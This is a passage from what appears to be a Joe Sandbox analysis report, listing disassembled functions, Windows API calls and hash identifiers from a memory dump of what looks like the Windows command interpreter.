                                                                            • _wcsnicmp.MSVCRT ref: 00B0C1B7
                                                                            • wcstol.MSVCRT ref: 00B0C1FC
                                                                            • wcstol.MSVCRT ref: 00B0C28A
                                                                            • longjmp.MSVCRT(?,000000FF), ref: 00B1CFB0
                                                                            • longjmp.MSVCRT(?,000000FF), ref: 00B1CFC4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
                                                                            • String ID:
                                                                            • API String ID: 2863075230-0
                                                                            • Opcode ID: ebecaf68e11c91a72ded96b3da1f6bde026aaf7953f7a1f426f5137e0398f3ab
                                                                            • Instruction ID: 64584e9ba9d8dd40d132129ef6b9da6680b6dddecc7a7ddba5c68f650322a25f
                                                                            • Opcode Fuzzy Hash: ebecaf68e11c91a72ded96b3da1f6bde026aaf7953f7a1f426f5137e0398f3ab
                                                                            • Instruction Fuzzy Hash: 8FF18E75D00215CBCB28DF98C8916BEBFF1FF88700F658299D816A7680EB716D46CB90
                                                                            Function 00B126DC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 193COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B12795
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • memset.MSVCRT ref: 00B1280E
                                                                            • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,00000000,00000104,-00000001,?,00000002,00000000), ref: 00B1281D
                                                                            • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000), ref: 00B12857
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,00000002,00000000), ref: 00B1290B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$EnvironmentVariable
                                                                            • String ID: DIRCMD
                                                                            • API String ID: 1405722092-1465291664
                                                                            • Opcode ID: 42235168e5e1840acf0ccbfba53fb96bb31b249505f982f890853068fd7bd3ea
                                                                            • Instruction ID: 90c1accca70d1a6946dbb5b1a59ba00f9bf28fdc9152fcfc36c87f285f9b7d8c
                                                                            • Opcode Fuzzy Hash: 42235168e5e1840acf0ccbfba53fb96bb31b249505f982f890853068fd7bd3ea
                                                                            • Instruction Fuzzy Hash: 8C7147B1A0C3829FD764DF29D884A9BBBE4FF95300F50496EF599832A0DB309944CB57
                                                                            Function 00B131EA Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$iswdigit
                                                                            • String ID: +-~!$<>+-*/%()|^&=,
                                                                            • API String ID: 2770779731-632268628
                                                                            • Opcode ID: 025b9a301ca3903b443798248a95d617a993936f37d162e49fcd9706189ffdb4
                                                                            • Instruction ID: 36459d3957623e05c1ad482859bd8a335c926e913bd7c0370c78a86dfb1bdb8d
                                                                            • Opcode Fuzzy Hash: 025b9a301ca3903b443798248a95d617a993936f37d162e49fcd9706189ffdb4
                                                                            • Instruction Fuzzy Hash: 191154362042129FD724AF6ADC449B677E9FF9BB61370009EF581C7290FB31DD4096A5
                                                                            Function 00B049F8 Relevance: 12.2, APIs: 8, Instructions: 187COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B09A11: _get_osfhandle.MSVCRT ref: 00B09A1C
                                                                              • Part of subcall function 00B09A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B0793A,00000104,?), ref: 00B09A2B
                                                                              • Part of subcall function 00B09A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B09A47
                                                                              • Part of subcall function 00B09A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374), ref: 00B09A56
                                                                              • Part of subcall function 00B09A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374), ref: 00B09A61
                                                                              • Part of subcall function 00B09A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B09A6A
                                                                            • _get_osfhandle.MSVCRT ref: 00B186E3
                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B186EB
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 00B1872A
                                                                            • _get_osfhandle.MSVCRT ref: 00B18743
                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B1874B
                                                                              • Part of subcall function 00B09B3B: _get_osfhandle.MSVCRT ref: 00B09B4E
                                                                              • Part of subcall function 00B09B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00B40AF0,000000FF,00B3A7F0,00002000,00000000,00000000), ref: 00B09B8E
                                                                              • Part of subcall function 00B09B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00B3A7F0,-00000001,?,00000000), ref: 00B09BA3
                                                                            • longjmp.MSVCRT(00B40A30,00000001), ref: 00B187CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                                                            • String ID:
                                                                            • API String ID: 1333215474-0
                                                                            • Opcode ID: 5e08924d9677e65cb578d174fdc49de4c71170e45f73ebbc404e57790aa115d5
                                                                            • Instruction ID: 8078c0f4c14bff008566434a10f40a5b1a08d0680183f7a9f04e53d2bc446735
                                                                            • Opcode Fuzzy Hash: 5e08924d9677e65cb578d174fdc49de4c71170e45f73ebbc404e57790aa115d5
                                                                            • Instruction Fuzzy Hash: 1251B871B40301EBDB24AB74D899BAEB7E4FB00715F5049A9F506D72C1EF70DD808A51
                                                                            Function 00B06150 Relevance: 10.8, APIs: 7, Instructions: 264COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                            • iswspace.MSVCRT ref: 00B061E4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$iswspace
                                                                            • String ID:
                                                                            • API String ID: 3458554142-0
                                                                            • Opcode ID: 4e6f713802e4ee24125b73a0b9dd4c48181f4bc012d624b043a2c7fe675af03e
                                                                            • Instruction ID: 875fa5c0a66aee2e7df0c1bbd75305bffab860d308d1f6e96929e102d5dcb087
                                                                            • Opcode Fuzzy Hash: 4e6f713802e4ee24125b73a0b9dd4c48181f4bc012d624b043a2c7fe675af03e
                                                                            • Instruction Fuzzy Hash: 4991BE70900294EEDB24DF65EC55AAEBBF4FF49300F6080AEE805D72D0EB719881CB55
                                                                            Function 00B0A6A0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 191COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp
                                                                            • String ID: ELSE$IF/?
                                                                            • API String ID: 2081463915-1134991328
                                                                            • Opcode ID: 9a5e815c1cc921782b69cd94b0b200d4b45963488e8e8138731c0f5f2608b7d6
                                                                            • Instruction ID: 76b8eb354086c6955f386cf4709289381b0cbc0efad6ec73257a66ceaf5ba71b
                                                                            • Opcode Fuzzy Hash: 9a5e815c1cc921782b69cd94b0b200d4b45963488e8e8138731c0f5f2608b7d6
                                                                            • Instruction Fuzzy Hash: CF515E326843019AE731AB35AC56B6B3FE4EB41390F2488EED5458B1E1EF71CC80C756
                                                                            Function 00B162C0 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B1643A: NtOpenThreadToken.NTDLL ref: 00B16454
                                                                              • Part of subcall function 00B1643A: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00B1646C
                                                                              • Part of subcall function 00B1643A: NtClose.NTDLL ref: 00B164BD
                                                                            • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 00B163B5
                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00B163E3
                                                                            • RtlNtStatusToDosError.NTDLL ref: 00B21EF4
                                                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00B21EFB
                                                                            • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?,000000FF,00000002,00000000), ref: 00B21F6B
                                                                            • wcsstr.MSVCRT ref: 00B21F86
                                                                            • wcsstr.MSVCRT ref: 00B21FA4
                                                                              • Part of subcall function 00B1640A: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,00B29C96,00B1FDFA,00000000,?), ref: 00B1642F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                            • String ID:
                                                                            • API String ID: 1313749407-0
                                                                            • Opcode ID: 77fab8ce5fc3d3d22358c91445a8c122c4a243da07e46623712845ad0b9904d0
                                                                            • Instruction ID: 94e9c927510fcec140e27eaadf3f4b697712828c7a99c1363bdeff181d86b1cc
                                                                            • Opcode Fuzzy Hash: 77fab8ce5fc3d3d22358c91445a8c122c4a243da07e46623712845ad0b9904d0
                                                                            • Instruction Fuzzy Hash: D0510035A402299BDF249F69AC887EE77E4EB54310F5440E9E919E7280EB70DE81CB94
                                                                            Function 00B29A7D Relevance: 10.6, APIs: 7, Instructions: 138COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B29AC2
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 00B29B22
                                                                            • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 00B29B32
                                                                            • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 00B29BAD
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00B29BB8
                                                                            • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00B29BCB
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,?), ref: 00B29BF9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Error$CurrentDirectoryModememset$Last
                                                                            • String ID:
                                                                            • API String ID: 1725644760-0
                                                                            • Opcode ID: 3854cef637e9c26b1188ca5a6860d093dca09bb5fb7165847db53b5fa098a3f9
                                                                            • Instruction ID: 302fb8a1758e7bac0f773022cd94118c4fef0c5b7938b7e68ccfe5706d675404
                                                                            • Opcode Fuzzy Hash: 3854cef637e9c26b1188ca5a6860d093dca09bb5fb7165847db53b5fa098a3f9
                                                                            • Instruction Fuzzy Hash: 21417035A002189BDF14DBA4EC89AEEB7F4FF19710F00819DE909E7290EB34DA41CB55
                                                                            Function 00B2B701 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0(00000000,00000000,00000000,00000001), ref: 00B2B717
                                                                            • GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 00B2B72A
                                                                            • RoUninitialize.API-MS-WIN-CORE-WINRT-L1-1-0(?,?,?), ref: 00B2B7FC
                                                                              • Part of subcall function 00B08235: _get_osfhandle.MSVCRT ref: 00B0824E
                                                                              • Part of subcall function 00B08235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B08256
                                                                              • Part of subcall function 00B08235: _get_osfhandle.MSVCRT ref: 00B08264
                                                                              • Part of subcall function 00B08235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B0826C
                                                                            • memset.MSVCRT ref: 00B2B76D
                                                                            • GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(?,?,?), ref: 00B2B788
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Console$ModeWindow_get_osfhandle$InitializeUninitializememset
                                                                            • String ID: <
                                                                            • API String ID: 1664749912-4251816714
                                                                            • Opcode ID: 1e2f3f1f9c76e5c362266c6d8b3e381ee46f619b27bd6f0bcae636cd1229708a
                                                                            • Instruction ID: 64f7915081b4d79054b67a08bf065822ed709f1dcc35124dd7c212ccbe3f2d6c
                                                                            • Opcode Fuzzy Hash: 1e2f3f1f9c76e5c362266c6d8b3e381ee46f619b27bd6f0bcae636cd1229708a
                                                                            • Instruction Fuzzy Hash: 23310BB5D00219EFCB11DFA9E885ADEBBF8FF55344F108056E909E7350EB309A458B61
                                                                            Function 00B081EC Relevance: 10.5, APIs: 7, Instructions: 41synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,?,?,?,00B27FC9,?,00B299AE,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B08203
                                                                            • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,00B27FC9,?,00B299AE,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B0820E
                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00B27FC9,?,00B299AE,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B08229
                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00B27FC9,?,00B299AE,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B1B0AB
                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00B27FC9,?,00B299AE,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B1B0C1
                                                                            • fprintf.MSVCRT ref: 00B1B0D5
                                                                            • fflush.MSVCRT ref: 00B1B0E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                                                            • String ID:
                                                                            • API String ID: 4271573189-0
                                                                            • Opcode ID: feb291b6f0f7f43d04710d5bbbe58d1681840d375a953f415aeccf5d7f075b50
                                                                            • Instruction ID: c55f3b515a469695507d241c927a634f0af57df5d23bc69bca3c002f1793dceb
                                                                            • Opcode Fuzzy Hash: feb291b6f0f7f43d04710d5bbbe58d1681840d375a953f415aeccf5d7f075b50
                                                                            • Instruction Fuzzy Hash: EF014F35049214FFEB116BA8ED0EA9E7AACFB0B315F100145F125A31F1CFB55741AB62
                                                                            Function 00B13CD0 Relevance: 9.4, APIs: 6, Instructions: 438COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B13D30
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,?,00000000), ref: 00B13E3D
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,00000000), ref: 00B13E88
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$FullNamePath
                                                                            • String ID:
                                                                            • API String ID: 3158150540-0
                                                                            • Opcode ID: c18e7de6a0b1a7978eac9836d8a2feb33a6563b9b51c32712f15b2cd4e40a328
                                                                            • Instruction ID: 8cc70a89468423824e029df2124d562cb0b773720f0475c7eba38f5ae91e6dda
                                                                            • Opcode Fuzzy Hash: c18e7de6a0b1a7978eac9836d8a2feb33a6563b9b51c32712f15b2cd4e40a328
                                                                            • Instruction Fuzzy Hash: CA027135A002169BCB24DF68D8956FAB3F1FF48714F9841E9D80A97294E734AEC2CF54
                                                                            Function 00B0498F Relevance: 9.2, APIs: 6, Instructions: 157COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B1858D
                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B18595
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 00B185D4
                                                                            • _get_osfhandle.MSVCRT ref: 00B185ED
                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B185F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Console$Write_get_osfhandle$Mode
                                                                            • String ID:
                                                                            • API String ID: 1066134489-0
                                                                            • Opcode ID: 1bb03955611442c80b9a5f183c50cc7b2126fa7fa45fb6f47a66861ba1213724
                                                                            • Instruction ID: 1c9bb00b5468d334cf009215cd7c412537fffb8b02f6f0b621d95cc180b5b82e
                                                                            • Opcode Fuzzy Hash: 1bb03955611442c80b9a5f183c50cc7b2126fa7fa45fb6f47a66861ba1213724
                                                                            • Instruction Fuzzy Hash: B841D371A002009BCF289F78D889AAEB7E9FB50344F5444E9E906DB2C5EF70DD80CB51
                                                                            Function 00B0B7A8 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _tell.MSVCRT ref: 00B0B7F9
                                                                            • _close.MSVCRT ref: 00B0B82C
                                                                            • memset.MSVCRT ref: 00B0B8CC
                                                                            • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 00B0B936
                                                                            • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00B3C9F0), ref: 00B0B947
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B0B96D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleInfoOutput_close_tellmemset
                                                                            • String ID:
                                                                            • API String ID: 1380661413-0
                                                                            • Opcode ID: 44feb5a4d4f8d4d9fdf70bb25098d5e5cbaa42e0d9db730eb0705d1ca1cb4382
                                                                            • Instruction ID: 5ff057c8db16bd50b1725b6fb57b0ec126f393b4b141f96d653ad3dacc020b37
                                                                            • Opcode Fuzzy Hash: 44feb5a4d4f8d4d9fdf70bb25098d5e5cbaa42e0d9db730eb0705d1ca1cb4382
                                                                            • Instruction Fuzzy Hash: 8041E671A403409BDB359F28D849B6E7FE5EB85314F2449ACE895972E0EB30DC85CB52
                                                                            Function 00B07F47 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B07F7C
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000001), ref: 00B07FC0
                                                                            • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00B07FF3
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,00000001), ref: 00B0800C
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B1B05A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
